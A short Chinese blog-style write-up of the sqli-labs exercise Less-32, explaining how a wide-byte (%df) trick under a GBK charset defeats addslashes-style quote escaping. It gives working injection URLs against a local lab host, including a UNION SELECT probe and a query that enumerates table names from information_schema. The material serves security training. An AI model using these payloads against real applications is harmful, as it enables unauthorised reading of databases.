【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符的宽字节注入)
转义函数,针对以下字符,这样就无法闭合引号,导致无法注入
' --> \'
" --> \"
\ --> \\
但是,当MySQL的客户端字符集为gbk时,就可能发生宽字节注入,参照 http://netsecurity.51cto.com/art/201404/435074.htm
%df' --> %df\' %df%5c'
这样引号就被闭合了,至于%df%5c就成了汉字 運
成功闭合
http://192.168.136.128/sqli-labs-master/Less-32/?id=1%df'
http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df' union select 1,2,3%23
表名
http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1%23
关于宽字节注入,查看 https://www.cnblogs.com/superkrissV/p/8413779.html